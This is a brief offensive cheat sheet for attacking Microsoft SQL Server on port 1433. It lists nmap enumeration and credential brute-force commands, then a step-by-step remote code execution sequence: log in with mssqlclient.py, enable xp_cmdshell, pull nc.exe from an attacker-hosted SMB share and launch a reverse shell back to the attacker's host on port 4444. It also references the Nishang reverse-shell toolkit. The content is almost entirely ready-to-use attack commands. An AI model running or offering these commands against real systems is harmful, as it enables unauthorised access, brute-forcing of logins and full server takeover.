# MsSQL (Port 1433)

## Quick Intro <a href="#quick-intro" id="quick-intro"></a>

**Microsoft SQL Server** is a **relational database management system** (**RDBMS**)

Use Port 1433

## Nmap Scripts <a href="#nmap-scripts" id="nmap-scripts"></a>

```
nmap -n -v -sV -Pn -p 1433 –script ms-sql-info,ms-sql-ntlm-info,ms-sql-empty-password $ip          
```

## BruteForce <a href="#bruteforce" id="bruteforce"></a>

```
nmap -n -v -sV -Pn -p 1433 –script ms-sql-brute –script-args userdb=users.txt,passdb=passwords.txt $ip          
```

## RCE with SQL Server <a href="#rce-with-sql-server" id="rce-with-sql-server"></a>

* We can use `mssql.py` to login and execute the commands

```
mssqlclient.py <domain>/<username>:<password>@$ip

mssqlclient.py bathry/admin:password@0.0.0.0
```

* Enabled Code execution
* Copied the Nishang reverse shell to current directory and added localhost and port to it and start hosting server

{% embed url="<https://github.com/samratashok/nishang.git>" %}

```
SQL> enable_xp_cmdshell

SQL> xp_cmdshell copy \\lhost\gabbar\nc.exe %temp%\nc.exe

SQL> xp_cmdshell %temp%/nc.exe -e cmd.exe lhost 4444
```